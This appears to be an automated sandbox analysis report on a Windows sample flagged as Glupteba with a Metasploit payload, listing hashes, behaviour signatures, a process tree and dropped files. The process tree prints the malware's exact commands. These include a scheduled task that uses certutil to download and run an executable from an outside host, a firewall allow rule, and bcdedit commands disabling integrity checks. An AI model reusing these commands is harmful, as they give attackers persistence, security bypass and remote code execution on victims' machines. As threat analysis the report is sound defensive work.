Analysis

  • max time kernel
    150s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    15-01-2024 05:47

General

  • Target

    5c4a2bfc412603a57e770cb9129598c1.exe

  • Size

    4.4MB

  • MD5

    5c4a2bfc412603a57e770cb9129598c1

  • SHA1

    1c2a416245ffcc5e61ef47f72c0216075ca5ce95

  • SHA256

    b7ba0c0a6d055683da95cbec459739f13f6d0499f25b35ebeec2c625dc770b3e

  • SHA512

    cce3a36565e36c7a88dcb4e782937619ee94bdc457be311e62bdd9b975583b64816e7fa95db117bbf028f5f0b95dbb43f972cfcc4283a53047cbf112beb9b091

  • SSDEEP

    98304:YRRqu5E4LwYYX93bjAoXn5J2bdQPHw4lPmhQeHpNgpGPEoqE:YPq4MX93b8wn5YbdQvw4lPmhQeJNAGPh

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 19 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Windows security bypass 2 TTPs 10 IoCs
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 13 IoCs
  • Windows security modification 2 TTPs 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 6 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • GoLang User-Agent 3 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 17 IoCs
  • Suspicious behavior: EnumeratesProcesses 51 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\5c4a2bfc412603a57e770cb9129598c1.exe
    "C:\Users\Admin\AppData\Local\Temp\5c4a2bfc412603a57e770cb9129598c1.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:2276
    • C:\Users\Admin\AppData\Local\Temp\5c4a2bfc412603a57e770cb9129598c1.exe
      "C:\Users\Admin\AppData\Local\Temp\5c4a2bfc412603a57e770cb9129598c1.exe"
      2⤵
      • Windows security bypass
      • Loads dropped DLL
      • Windows security modification
      • Adds Run key to start application
      • Checks for VirtualBox DLLs, possible anti-VM trick
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\Windows\system32\cmd.exe
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1980
        • C:\Windows\system32\netsh.exe
          netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
          4⤵
          • Modifies Windows Firewall
          • Modifies data under HKEY_USERS
          PID:1732
      • C:\Windows\rss\csrss.exe
        C:\Windows\rss\csrss.exe /93-93
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Manipulates WinMon driver.
        • Manipulates WinMonFS driver.
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1876
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
          4⤵
          • Creates scheduled task(s)
          PID:2168
        • C:\Windows\system32\schtasks.exe
          schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
          4⤵
          • Creates scheduled task(s)
          PID:1812
        • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
          "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Modifies system certificate store
          • Suspicious use of WriteProcessMemory
          PID:1644
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:528
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2232
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2308
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1612
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2396
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2440
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2408
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1148
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1376
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1804
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:976
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -timeout 0
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1060
          • C:\Windows\system32\bcdedit.exe
            C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:2912
        • C:\Windows\system32\bcdedit.exe
          C:\Windows\Sysnative\bcdedit.exe /v
          4⤵
          • Modifies boot configuration data using bcdedit
          PID:2476
        • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
          4⤵
          • Executes dropped EXE
          PID:1256
        • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
          C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:1676
  • C:\Windows\system32\makecab.exe
    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240115054729.log C:\Windows\Logs\CBS\CbsPersist_20240115054729.cab
    1⤵
    • Drops file in Windows directory
    PID:1816

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

    Filesize

    8.3MB

    MD5

    fd2727132edd0b59fa33733daa11d9ef

    SHA1

    63e36198d90c4c2b9b09dd6786b82aba5f03d29a

    SHA256

    3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e

    SHA512

    3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

  • C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

    Filesize

    395KB

    MD5

    5da3a881ef991e8010deed799f1a5aaf

    SHA1

    fea1acea7ed96d7c9788783781e90a2ea48c1a53

    SHA256

    f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4

    SHA512

    24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

    Filesize

    896KB

    MD5

    389ac41d12028d3fda4e6197995cb25a

    SHA1

    36761cd997215005f8ae7e649b0bcde3cbd945ca

    SHA256

    ff4dce6fec8df8545189144b499f44ee839e4a767ae32697d20277bb50865abf

    SHA512

    35e3b72a2ad55b90b50858de6bb1a2fd37a32f375ec541382d0b74d2a0d52e2980bc5ae5282eb6f6477616e1cd18f1c46dc7b9d5bd78266e0f02b24dbd189964

  • C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

    Filesize

    3.0MB

    MD5

    6bc9fe54c08dc983fbdebebbd6ff831c

    SHA1

    41a2c1d4f010c42aedf4935d5c6bde2bb3ef6b80

    SHA256

    bedf5451defa9e6fc18f0aa50c76f7e673949d74d735838dc399bd08a789abb7

    SHA512

    66d726c5a4d45fecc3e4ff1897716db38db04ad6193383d3e90c5b669aad7682e754cc9714e9555380e1ee57a59757ed94354dc512d6587227c8d38aed7dbf40

  • C:\Users\Admin\AppData\Local\Temp\osloader.exe

    Filesize

    591KB

    MD5

    e2f68dc7fbd6e0bf031ca3809a739346

    SHA1

    9c35494898e65c8a62887f28e04c0359ab6f63f5

    SHA256

    b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4

    SHA512

    26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    656670e363885b4f3ad5181e408a2234

    SHA1

    7881f95d475df46a617e1745762cb6da616be73b

    SHA256

    d4f44e01118fa90fb8008a2ada45ad214aea3dc31af680d9dfd299abd9578ea5

    SHA512

    ebda91d3126f0bec000f60817e6cf9d4706919f19c1193100e535f36cd4d91cbf5eca5a05c247cc433a9bfbc49dab31bfd5ec530b09c73edd3b3f6aa93ca65af

  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    08697ee0dcfd4838d6c4562e486e1b0f

    SHA1

    f2309fbbe2df708e9fee2de754544562d7b82409

    SHA256

    62ae42357eaae92e6c9de405a74e260b680ead6c5c5e8197583e29820997c7e2

    SHA512

    a80eaed432917a27bb363f2e049b85d1a1a5975ff308292459dcde69efe2ed06d40b1d643dce511ee2452ec4ef5fc25a549b42d83ce57a3c17f23ebb6ec19569

  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    4acc3331f3562e14442f1e0b6d1364e0

    SHA1

    1c2203bf0bc4eb6d9db3118299acb1bc47bc5605

    SHA256

    c303baff4cfe5e98f29fe5b87147c5b6411140cf44b16d5dd2dc3a4c460b1572

    SHA512

    9cdcd1b538d4cfd551e3b763ea1b16978c7fd662a0d92978c8a7328b7d8eca4bfe2b6f99453b198cfefb75d770fa20aa066875cd86b6d1cdc8715d61eb09d5d9

  • C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    242B

    MD5

    5d16464190afee6385af3ae8001ee6a1

    SHA1

    c15ba85709770800928ed70bd2933eefdfec8428

    SHA256

    d505600ea08552d480fe270923152f2782e17f6e3f0c4130ba225623ec2cfbcc

    SHA512

    b6ee6b24955df0e26f52ad9eebe1305acb3718f9d95036217bff5e10cd965ce4327c493ae90bdec5fbcb2762c2534c9b6e11f31018c992ff6ed9f3f1add4d057

  • C:\Windows\Temp\Cab473D.tmp

    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Windows\Temp\Tar4935.tmp

    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • C:\Windows\rss\csrss.exe

    Filesize

    1.2MB

    MD5

    b5c34be30d26cadb540309cfb2f10e7f

    SHA1

    3663ee7dbbb9d317d1f0a53a9a6e5c2e380fd82c

    SHA256

    2a782eda563d236626472df34346d913b90ae3eb2cfcffc9127ff52fb02e1ad9

    SHA512

    f7a78c1caee4247e0c92c4cf296fd40693786ad611ef0731295a90ca6b54fa2e2871b6517042047802fe7164b37ebbb3b2a8af1c285399f6104c38695ca0b88c

  • C:\Windows\rss\csrss.exe

    Filesize

    2.2MB

    MD5

    4acd5ab32cf70d30caa09ec2d7417dc1

    SHA1

    04150404a217687369b683365acd9a7ca303b0d7

    SHA256

    72fcbbb3394c096ca2d7a512715e1c5af28074c5fdd1da200014c5be97a83aad

    SHA512

    f0e8793173e25dc9adb33f1a40f476a8eadc21a69ad84d4ae9a13f22cf2381057558fe988db4118c67d5784af951dfcf105560b622342321317eccb7ddfb5c6d

  • C:\Windows\rss\csrss.exe

    Filesize

    4.4MB

    MD5

    5c4a2bfc412603a57e770cb9129598c1

    SHA1

    1c2a416245ffcc5e61ef47f72c0216075ca5ce95

    SHA256

    b7ba0c0a6d055683da95cbec459739f13f6d0499f25b35ebeec2c625dc770b3e

    SHA512

    cce3a36565e36c7a88dcb4e782937619ee94bdc457be311e62bdd9b975583b64816e7fa95db117bbf028f5f0b95dbb43f972cfcc4283a53047cbf112beb9b091

  • \Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

    Filesize

    94KB

    MD5

    d98e78fd57db58a11f880b45bb659767

    SHA1

    ab70c0d3bd9103c07632eeecee9f51d198ed0e76

    SHA256

    414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0

    SHA512

    aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

  • \Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

    Filesize

    281KB

    MD5

    d98e33b66343e7c96158444127a117f6

    SHA1

    bb716c5509a2bf345c6c1152f6e3e1452d39d50d

    SHA256

    5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

    SHA512

    705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

  • \Users\Admin\AppData\Local\Temp\csrss\patch.exe

    Filesize

    1024KB

    MD5

    e33401b93442ca977d59e5da219a6aaf

    SHA1

    33681c24e68e86fa5bb35a7b76b7a832780def1b

    SHA256

    a0ca2816632b39247e91f4b5b3f1c47848aa0feee756a1e0fffc72b1360c6251

    SHA512

    30467f815aafba392be2319946e1b38a7f8d0057b770e28e49622c5e4db90a508186a0087ef09e1968075500f71eef80b69f556790c656c0c5a1cfd6aff80b3e

  • \Users\Admin\AppData\Local\Temp\dbghelp.dll

    Filesize

    1.5MB

    MD5

    f0616fa8bc54ece07e3107057f74e4db

    SHA1

    b33995c4f9a004b7d806c4bb36040ee844781fca

    SHA256

    6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026

    SHA512

    15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

    Filesize

    2.9MB

    MD5

    56a0619d1940f7875bb0c26d3eff18ee

    SHA1

    7009c8991127ab75b68008381da26de9d271421f

    SHA256

    8ab5704be549b68d8e180d232872aca05ba89f4f88758a0da6a0f777e98eeaea

    SHA512

    f4a90142f5f4d81aa2961bbfb08fc8e2309be4c7cdb042ea9950a3537ab8e2f8aa09b0be1cd7388cbe19983969437ce813211f4741dd35e97165ced135b536f7

  • \Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

    Filesize

    1.8MB

    MD5

    c41c3be9c15587a82952179c1c4467e3

    SHA1

    4015bd6d980e260c3bf759c37ef1463fd4d88bc2

    SHA256

    ab3ca69ff0282d028f4b8460e921d37553e98ebf12c6a9f8c6741875d889e9d3

    SHA512

    17c69a1d66c53d82036806e82fe849570052853839eeefde1f9cb4ec5e3628ed7dc3d06d453b9f35fd7cf51abb8006c78322841ad37829d6b87638fc7060f4a5

  • \Users\Admin\AppData\Local\Temp\symsrv.dll

    Filesize

    163KB

    MD5

    5c399d34d8dc01741269ff1f1aca7554

    SHA1

    e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

    SHA256

    e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

    SHA512

    8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

  • \Windows\rss\csrss.exe

    Filesize

    1.6MB

    MD5

    354a5e11850ab9c7149fcd6f0cb4213e

    SHA1

    48ffa487b15c9665146325d8fbc37d0ba3b2e446

    SHA256

    92835b4dea6e1918a4048abc00a9ce7d1473da7bd82de445f9e78d29779f2638

    SHA512

    d04a2c61d169cdffc02e669a45a8db7a0308a1389b26ce41554e2a3c6b6abb0bdcc25179c4d0cc1a67f62f75e30450a1897c593376b379785c264e9864745ca7

  • \Windows\rss\csrss.exe

    Filesize

    1.8MB

    MD5

    c46ff1a5337e0c80da1b5d959cab4ca5

    SHA1

    5a7cb2aff54484006489b91dc62bbe81e9e0dbc2

    SHA256

    06bba52006e146cc63ca406a2f9a5c525c9e7a42a0b52bcaaca459c3c84aa85a

    SHA512

    288da0ed9c1a32ec91e6c2ece91c3634a0f3e9ce1e70ccd024528fcde28a5a374d0735ce73aba656cf5ed87445e13a196e6b28e24fb4f4eb874a7234f6750c52

  • memory/1644-56-0x0000000140000000-0x00000001405E8000-memory.dmp

    Filesize

    5.9MB

  • memory/1644-41-0x0000000140000000-0x00000001405E8000-memory.dmp

    Filesize

    5.9MB

  • memory/1876-280-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/1876-344-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/1876-252-0x00000000049F0000-0x0000000004E2C000-memory.dmp

    Filesize

    4.2MB

  • memory/1876-55-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/1876-33-0x0000000004E30000-0x0000000005756000-memory.dmp

    Filesize

    9.1MB

  • memory/1876-345-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/1876-256-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/1876-18-0x00000000049F0000-0x0000000004E2C000-memory.dmp

    Filesize

    4.2MB

  • memory/1876-343-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/1876-342-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/1876-323-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/1876-251-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/1876-346-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/1876-32-0x00000000049F0000-0x0000000004E2C000-memory.dmp

    Filesize

    4.2MB

  • memory/1876-35-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/1876-257-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/2276-4-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/2276-6-0x0000000004E30000-0x0000000005756000-memory.dmp

    Filesize

    9.1MB

  • memory/2276-3-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/2276-2-0x0000000004E30000-0x0000000005756000-memory.dmp

    Filesize

    9.1MB

  • memory/2276-7-0x00000000049F0000-0x0000000004E2C000-memory.dmp

    Filesize

    4.2MB

  • memory/2276-1-0x00000000049F0000-0x0000000004E2C000-memory.dmp

    Filesize

    4.2MB

  • memory/2276-0-0x00000000049F0000-0x0000000004E2C000-memory.dmp

    Filesize

    4.2MB

  • memory/2596-5-0x0000000004CD0000-0x000000000510C000-memory.dmp

    Filesize

    4.2MB

  • memory/2596-8-0x0000000004CD0000-0x000000000510C000-memory.dmp

    Filesize

    4.2MB

  • memory/2596-9-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/2596-19-0x0000000000400000-0x000000000309C000-memory.dmp

    Filesize

    44.6MB

  • memory/2596-20-0x0000000004CD0000-0x000000000510C000-memory.dmp

    Filesize

    4.2MB